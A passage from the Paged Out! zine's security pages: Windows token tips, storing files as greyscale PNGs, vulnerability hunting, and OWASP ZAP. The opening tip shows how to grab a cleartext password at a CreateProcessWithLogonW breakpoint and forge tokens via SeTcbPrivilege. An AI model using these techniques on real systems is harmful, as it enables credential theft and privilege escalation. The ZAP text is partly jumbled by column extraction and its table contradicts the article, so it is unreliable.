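Why R8 for the password in the first bullet? Under the Microsoft x64 calling convention, the first four integer or pointer arguments travel in RCX, RDX, R8 and R9, and the rest go on the stack. The small Python sketch below only models that mapping for the documented parameter order of CreateProcessWithLogonW; it does not call any Windows API, and the helper name is invented for this illustration.

```python
# Microsoft x64 calling convention: registers used for the first four
# integer/pointer arguments; further arguments are passed on the stack.
WIN64_ARG_REGISTERS = ("RCX", "RDX", "R8", "R9")

# Parameter order of CreateProcessWithLogonW as documented by Microsoft.
CREATE_PROCESS_WITH_LOGON_PARAMS = (
    "lpUsername",
    "lpDomain",
    "lpPassword",
    "dwLogonFlags",
    "lpApplicationName",
    "lpCommandLine",
    "dwCreationFlags",
    "lpEnvironment",
    "lpCurrentDirectory",
    "lpStartupInfo",
    "lpProcessInformation",
)


def argument_location(params, name):
    """Tell where the named argument lives when the function is entered."""
    index = params.index(name)
    if index < len(WIN64_ARG_REGISTERS):
        return WIN64_ARG_REGISTERS[index]
    return f"stack (argument #{index + 1})"


if __name__ == "__main__":
    for param in CREATE_PROCESS_WITH_LOGON_PARAMS:
        print(f"{param:22} -> {argument_location(CREATE_PROCESS_WITH_LOGON_PARAMS, param)}")
```

So a breakpoint on the function entry is enough: at that moment R8 holds a pointer to the cleartext password string.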
There is a less-than-easy way as well: if you are privileged to "Act as a
part of the operating system" via SeTcbPrivilege, you can ask LSASS for a
custom-made token following literally any criteria. Want to be
TrustedInstaller? Just ask. Use fake domain or non-existing user? No problem!
The flow is:
1. Add SID mapping via LsaManageSidNameMapping() for the fake domain.
2. Add SID mapping (same way) for the fake user.
3. Ask for a token using SIDs prepared by calling LogonUserExExW().
4. Duplicate the token obtained to make it useful for impersonating.
5. Call CreateProcessAsUser().
If you want to dig into token internals, WinDbg seems to be the best option.
You can use the following commands:
- "dt nt!_token" - displays token structure taken from Symbols.
- "!token" - displays the current token in a friendly way
- "!process 0nXXXX 1" - displays process (PID=XXXX) data including ready-to-
click token address in the memory.

Grzegorz Tworek
https://x.com/0gtweet
SAA-TIP 0.0.7 https://github.com/gtworek/PSBits
Security/Hacking Using PNG as a way to share files

Using PNG as a way to share files with your friends.

Discover if it is possible to store and share files as a PNG
image with various platforms.

How does it work?
PNG has a few color types. The most interesting for us, and also
easy to implement, is “greyscale”, where each pixel is exactly one
byte (a value from 0 to 255).
Each file is made out of bytes, so we can simply loop over the
byte representation of the file and store consecutive bytes as
consecutive pixels in an image.

Implementation
Saving as PNG

Python PIL has the Image.frombuffer() function to make an image
from raw bytes. But we have one problem - the size of the file
can be different from the number of pixels in the image. The solution
is to put extra \x00 bytes at the end of the file and save the original
length of the file in the image metadata (referred to as EXIF in this
article) so that it’ll be possible to restore the exact file in the future.

Reading from PNG

With greyscale it’s simple. We need to loop over each pixel and
save its value to a list, read the length of the file from the metadata,
and then save the segment where our file is stored.

    from PIL import Image
    from PIL.PngImagePlugin import PngInfo
    from math import sqrt, ceil

    def get_byte_list(path: str) -> list:
        file = open(path, 'rb').read()
        return [b for b in file]

    def save_image(path: str):
        metadata = {}
        raw_data = open(path, 'rb').read()
        metadata['length'] = raw_data_length = len(raw_data)
        width = height = ceil(sqrt(raw_data_length))
        # pad with zero bytes until the data fills the whole square
        while raw_data_length != width * height:
            raw_data += b'\x00'
            raw_data_length += 1
        image = Image.frombuffer('L', (width, height), raw_data)
        info = PngInfo()
        for key, value in metadata.items():
            # text chunks hold strings, so the length is stored as text
            info.add_text(key, str(value))
        image.save('output.png', pnginfo=info)

    def read_image(path: str) -> (list, dict):
        image = Image.open(path)
        width, height = image.size
        pixels = [image.getpixel((x, y)) for y in range(height)
                  for x in range(width)]
        return (pixels, image.info)

    def save_file(path: str, name: str) -> None:
        image, metadata = read_image(path)
        length = int(metadata['length'])
        open(name, 'wb').write(bytes(image[:length]))

    if __name__ == '__main__':
        model_path: str = 'some_random_file.txt'
        image_path: str = 'output.png'
        save_image(model_path)
        # write the recovered bytes to a new file (example name)
        save_file(image_path, 'restored_file.txt')

Space

Using PNG as file storage sometimes saves space, because PNG
compresses the pixel data losslessly. When I used this algorithm to
share a file that was 1.7 MB, the resulting image took 272 KB.
That's about 6 times less space!

Sharing
Will sharing somehow destroy our file? I tested 6 different
ways to share and checked it.

1. Messenger

The first issue with Messenger is that Meta has a policy of getting
rid of EXIF data, so our length inside the metadata is gone. But
when we share the length of the file in a message, we can set it
manually and it works! We shared the file via an image!

2. Signal

Signal has the same policy - they cut off all EXIF data. But this
time, when we tried to set the length ourselves, we got a False
return. When we read pixels from the image, we can see that
they’re represented as (R, G, B, A), so Signal converts our picture to
RGBA.

3. Protonmail

When sharing files as an attachment or as an embedded image,
both cases were True.

4. Discord

Same as Protonmail: when we send images via
Discord, we get the exact image with all metadata.

5. SMS

With SMS, we have 2 issues, but one is major. Firstly,
EXIF has been cut off. Secondly, the image has been
converted to JPG, so it’s impossible to decode our file
even if we enter the length manually.

6. Instagram

Instagram has the same issue as SMS - they convert
images to JPG, so we can’t read bytes from pixels.

Note: I haven’t tested it on large files.
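The padding step described under "Saving as PNG" can be checked on its own, without PIL. The sketch below is a standard-library-only illustration with hypothetical function names: it pads the data to fill a square image and then trims it back using the stored length. It uses math.isqrt instead of ceil(sqrt()) to stay in integer arithmetic, which is a choice made for this example and not taken from the article's code.

```python
from math import isqrt


def pad_to_square(data: bytes):
    """Pad `data` with zero bytes so it exactly fills a side x side image.

    Returns (side, padded_data, original_length).
    """
    length = len(data)
    side = isqrt(length)
    if side * side < length:
        side += 1  # smallest side whose square holds every byte
    padded = data + b"\x00" * (side * side - length)
    return side, padded, length


def strip_padding(padded: bytes, length: int) -> bytes:
    """Recover the original bytes using the length kept in the metadata."""
    return padded[:length]


if __name__ == "__main__":
    side, padded, length = pad_to_square(b"hello world")
    print(side, len(padded), length)
    print(strip_padding(padded, length))
```

The stored length is essential: without it, a file that legitimately ends in zero bytes could not be told apart from the padding, which is why the tests with stripped metadata need the length to be sent separately.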

Jan "F4s0lix" Wawrzyniak


https://github.com/F4s0lix/file-to-image
SAA-ALL 0.0.7
Vulnerability Hunting The Right Way Security/Hacking

Vulnerability Hunting The Right Way


By ~ @Totally_Not_A_Haxxer

I am sure many people reading this are already familiar with the security and
vulnerability research world. Often, the vulnerabilities found are quite simple.
For example, you attack an IoT device and find the most basic, or maybe a
simple but new, form of XSS within that device. Going through this myself, I
have spent a lot of time raging over the simple stuff I was finding; given my
experience in development and my love for it, it's quite sad to see how common
simple flaws are. So I tried to look for a new angle, one that was not only a bit
more difficult to work through, but also taught me something new and felt nice
to handle.

Searching By The Root - Design Flaws

The “new angle” involves taking the root of a system and searching there. What
do I mean by this? Well, many flaws in existing software come from
unmaintained software designs. For example, let's say we are ripping open a new
IoT device, and this device uses a custom network protocol that nobody has seen
in the wild yet. If the protocol has not been documented yet, the first idea for
any security researcher would be to reverse engineer it yourself. When you go
down that path, you should be looking at the systems that the network protocol
is built on: which network layer the protocol sits on, whether the protocol is
part of an existing standard, and what the protocol is doing. Questions like
these help break down the design of the protocol further and thus bring you to
the root, where every flaw may sit.

Going to the bare bones of a system is not just necessary but also helpful,
because it gives you a full picture of the system and of all the systems that
rely on that design. For example, instead of finding XSS in a regular web
application, you may want to find XSS that stems from a specific technological
design; since it affects that technology and everything else that uses it, such
a finding is much more valuable. Think CWE versus CVE. I arrived at this angle
in my workflow by assessing the current state of the world and its technologies
alongside their vulnerabilities. The honest and hard truth is that, from a
design perspective, people have built so many technologies, computers,
protocols, standards, new forms of GSM, etc., all on old standards that were
never designed with security in mind. This is an extreme problem we are facing
now, and I increasingly see that the flaws that hit a system hardest reside at
its root rather than in its surface-level design. While this is not the only
method for finding bugs, it does not hurt to add it to your routine.

Totally_Not_A_Haxxer Instagram: https://www.instagram.com/totally_not_a_haxxer


Blog: https://www.medium.com/@Totally_Not_A_Haxxer
CC BY 4.0 GitHub: https://www.github.com/TotallyNotAHaxxer
Security/Hacking Zed Attack – test your web app

Zed Attack – test your web app allowing users to discover and fix vulnerabilities quickly
and efficiently, thanks in part to its open-source
Zed Attack Proxy (zaproxy.org) is an open-source philosophy. Open-source software has the advantage of
cybersecurity tool designed for developers and security being free, with no license fees that increase the cost of
experts to identify and fix vulnerabilities in web testing. Another advantage is the ability to customize and
applications. This tool is maintained by the Open Web
Application Security Project (OWASP), an organization
committed to improving web application security by
sharing knowledge and resources.

Needless to say, conducting regular and thorough testing
for web applications is critical to ensuring the quality and
security of the application and providing users with an
optimal experience. Such testing commonly includes
functional testing, penetration testing, and fuzz testing
(fuzzing). Functional testing involves verifying that all
application features are implemented correctly and meet
user expectations. Penetration testing is a fundamental
security test that aims to identify vulnerabilities and
security risks in the application. Fuzz testing is an
automated technique that involves generating random or
semi-random inputs to a program to identify vulnerabilities
or bugs.

This last method is particularly useful in the context of
computer security, as it can identify potential flaws in
software that attackers could exploit. Fuzzing can be
performed in various ways, such as mutation-based
fuzzing, where input data is randomly altered, or
generation-based fuzzing, where valid but unexpected
input is created. This technique is widely used by
computer security experts to test software robustness
and identify vulnerabilities that could be exploited by
malicious attackers. Fuzzing can enhance computer
system security and protect sensitive data from
cyberattacks.

As one might expect, ZAP offers special support for
fuzzing web applications. Additionally, ZAP provides
several features for testing and analyzing web application
security, including detecting vulnerabilities such as SQL
injection, cross-site scripting (XSS), clickjacking, and
SSL/TLS issues. It is also worth adding that its scanning
feature supports various modes, from "Attack" to "Safe,"
allowing both aggressive and cautious approaches to
targets.

Because of its intuitive user interface and flexibility, ZAP
has become a popular tool among developers and security
experts. It supports both automated and manual testing,
improve the software due to the availability of the source
code. ZAP also has a free plugin marketplace, which
allows users to expand its functionality.

Similar tools and comparison

Other similar open-source tools include Nuclei
(vulnerability scanner), Sn1perSecurity (attack surface
management platform), Nikto (web server vulnerability
scanner), and Arachni (web application security scanner
framework), all available on GitHub.

Another popular free tool is the Community Edition of Burp
Suite, which also offers a paid Enterprise Edition.
Compared to the other tools mentioned, both OWASP ZAP
and Burp Suite are considered eavesdropping proxies that
interpose themselves between the browser and the web
server to intercept and manipulate request exchanges. A
brief comparison of ZAP and Burp Suite CE is provided at
the bottom of the page.

While I've previously mentioned the positives of
open-source projects, it must be noted that in all
open-source projects, both development (such as fixes
and new features) and support heavily depend on the
volunteers behind them. Paid tools like Burp Suite have
the advantage of a dedicated company continually
working to improve the software, unlike many open-source
projects where volunteers may only contribute a small
portion of their time each week.

However, ZAP is a key tool for technical cybersecurity
analysts involved in managing web applications with
open-source solutions. With its powerful suite of features
and ease of use, ZAP helps users secure their web
applications and protect them from external threats.
Furthermore, ZAP, with its free and open-source
philosophy, supports many open standards and known
protocols, making it easy to develop and use add-ons or
plugins. Additionally, the ZAP community is available for
support through the ZAP user group on Google Groups [1]
and the IRC channel [2].

[1] https://groups.google.com/g/zaproxy-users
[2] https://web.libera.chat/#zaproxy
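
To make the mutation-based fuzzing described in the article more concrete, here is a minimal sketch in Python. It is not how ZAP's fuzzer is implemented; `parse_record` is a hypothetical toy target with a deliberately planted bug, and `mutate` and `fuzz` are illustrative names. The idea is only to show a valid seed input being randomly altered and the failures being collected.

```python
import random


def mutate(seed: bytes, rng: random.Random, max_changes: int = 3) -> bytes:
    """Return a copy of seed with one to max_changes random bytes overwritten."""
    data = bytearray(seed)
    for _ in range(rng.randint(1, max_changes)):
        pos = rng.randrange(len(data))
        data[pos] = rng.randrange(256)
    return bytes(data)


def parse_record(data: bytes) -> bytes:
    """Hypothetical target: the first byte declares the payload length."""
    if not data:
        raise ValueError("empty input")  # documented, expected rejection
    length = data[0]
    payload = data[1:]
    # Planted bug: the declared length is trusted without a bounds check,
    # so a length larger than the payload raises IndexError.
    _last_byte = payload[length - 1]
    return payload[:length]


def fuzz(target, seed: bytes, rounds: int = 200, rng_seed: int = 0):
    """Feed mutated inputs to target and collect the unexpected failures."""
    rng = random.Random(rng_seed)  # fixed seed keeps runs reproducible
    crashes = []
    for _ in range(rounds):
        candidate = mutate(seed, rng)
        try:
            target(candidate)
        except ValueError:
            pass  # the target rejected the input cleanly
        except Exception as exc:  # anything else counts as a finding
            crashes.append((candidate, exc))
    return crashes


crashes = fuzz(parse_record, b"\x05hello")
print(f"{len(crashes)} crashing inputs found")
```

A generation-based fuzzer would instead build inputs from a description of the format, for example by emitting records with every possible length byte, rather than altering an existing sample.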

Feature            | Burp Suite CE           | OWASP ZAP
Cost               | Free                    | Free
Interception       | Available               | Available
Spider             | Available               | Available
Update             | Available               | Available
Extensions         | Fewer Options Available | No provision for enhanced functionality
False Positive     | Less                    | More
Comparison Feature | Available               | Available
Documentation      | Extensive Documentation | Little documentation
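
The "Interception" row refers to both tools sitting between the client and the web server. As a rough illustration, the sketch below routes a Python client's traffic through such a proxy using only the standard library. The address `127.0.0.1:8080` is an assumption (it is the usual default for a local ZAP instance, but check your own configuration), and `build_proxied_opener` is a name made up for this example.

```python
import urllib.request

# Assumption: a ZAP (or Burp Suite) proxy is listening locally on this address.
PROXY_URL = "http://127.0.0.1:8080"


def build_proxied_opener(proxy_url: str = PROXY_URL) -> urllib.request.OpenerDirector:
    """Build an opener that sends HTTP and HTTPS requests through the proxy."""
    handler = urllib.request.ProxyHandler({"http": proxy_url, "https": proxy_url})
    return urllib.request.build_opener(handler)


opener = build_proxied_opener()

# With the proxy running, a request made like this would show up in its
# history, where it can be inspected or modified. The target URL is hypothetical:
# response = opener.open("http://localhost:3000/login")
```

For HTTPS targets the client also has to trust the proxy's own root CA certificate, otherwise certificate verification fails.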

Fabio Carletti aka Ryuw


https://www.linkedin.com/in/fabio-carletti-ryuw/
66 SAA-TIP 0.0.7
WE WANT YOUR ARTICLE!

Would you like to see your article published in the next issue of Paged
Out!?
Here’s how to make that happen:

First, you need an idea that will fit on one page.


That is one of our key requirements, if not the most important. Every article can only occupy one
page. To be more precise, it needs to occupy the space of 515 x 717 pts.

We have a nifty tool that you can use to check if your page size is ok -
https://review-tools.pagedout.institute/

The article has to be on a topic that is fit for Paged Out! Not sure if your topic is?

You can always ask us before you commit to writing. Or you can consult the list here:
https://pagedout.institute/?page=writing.php#article-topics

Once the topic is locked down, then comes the writing, and it has to be done by you. Remember,
you can write about AI but don’t rely on it to do the writing for you ;) Besides, you will do a better
job than it can!

Next, submit the article to us, preferably as a PDF file (you can also use PNGs for art), at
[email protected].

Here is what happens next:

First, you will receive a link to a form from us. The form asks some really important questions,
including which license you would prefer for your submission, details about the title and the name
under which the article should be published, which fonts you have used and the source of images
that are in it.

Remember that both the fonts and the images need to have licenses that allow them to be used
in commercial projects and to be embedded in a PDF.

Once the replies are received, we will work with you on polishing the article. The stages include a
technical review and a language review.
If there are images in your article, we will ask you for an alt text for them.

After the stages are completed, your article will be ready for publishing!

Not all articles have to be written. If you want to draw a cheatsheet, a diagram, or an image,
please do so, we accept such submissions as well.

This is a shorter and more concise version of the content that can be found here:
https://pagedout.institute/?page=writing.php and here:
https://pagedout.institute/?page=cfp.php

The most important thing though is that you enjoy the process of writing and then of getting your
article ready for publication in cooperation with our great team.

Happy writing!
